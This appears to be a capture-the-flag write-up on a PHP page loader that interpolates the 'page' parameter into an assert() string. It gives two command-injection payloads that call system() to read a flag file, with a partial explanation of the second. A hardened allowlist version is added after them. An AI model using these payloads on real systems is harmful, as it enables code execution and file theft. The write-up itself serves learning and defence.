<?php
    if (isset($_GET['page'])) {
        $page = $_GET['page'];
    } else {
        $page = "home";
    }
    $file = "templates/" . $page . ".php";
    // I heard '..' is dangerous!
    assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // if $file contains '..', the die after the `or` runs
    // TODO: Make this look nice
    assert("file_exists('$file')") or die("That file doesn't exist!");
    ?>

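    Constructing the payload:
    ?page=') or system("cat templates/flag.php");//

    That is, $file = templates/') or system("cat templates/flag.php");//
    assert("strpos('templates/') or system("cat templates/flag.php");//', '..') === false") or die("Detected hacking attempt!");

    The strpos part, marked in blue, evaluates to false, so assert executes the system statement after the first `or`, and the trailing // comments out the remaining ', '..') === false")
    Because strpos is false and system is true, and false or true is true, the assert part is true, so the die after the second `or` is never executed.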

    Payload 2:
    ?$page=').system("cat templates/flag.php");//
    I don't fully understand yet what this `.` does.
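
A hardened form of the loader above, as an added example that is not part of the original challenge or writeup: the `page` parameter is only used as a key into an allowlist and is never placed in a string that `assert()` evaluates as code (string assertions were deprecated in PHP 7.2 and removed in PHP 8.0). The allowlisted page names and the `resolve_template` helper are hypothetical, and templates are assumed to live in a `templates` directory beside the script.

```php
<?php
// Added example: hardened page loader (not the challenge's own code).
// Assumptions: templates live in ./templates; the page names are hypothetical.

const TEMPLATE_DIR  = __DIR__ . '/templates';
const ALLOWED_PAGES = ['home', 'about', 'contact']; // hypothetical allowlist

/**
 * Map an untrusted page name to a template path, or return null.
 * The input is never interpolated into code, only compared and concatenated
 * into a path after it has matched a known-good value.
 */
function resolve_template(?string $page): ?string
{
    $page = $page ?? 'home';

    // 1. Strict allowlist: anything containing quotes, parentheses,
    //    '..' or other unexpected characters simply fails the lookup.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise the path and confirm it is still
    //    inside TEMPLATE_DIR. realpath() returns false for missing files,
    //    which also replaces the original file_exists() assertion.
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Reject non-string input such as ?page[]=x before it reaches the helper.
$input    = $_GET['page'] ?? null;
$template = resolve_template(is_string($input) ? $input : null);

if ($template === null) {
    http_response_code(404);
    exit('That page does not exist.');
}
require $template;
```

On PHP 7.x deployments that still carry string assertions, setting `zend.assertions = -1` in the production `php.ini` stops `assert()` from evaluating anything at all.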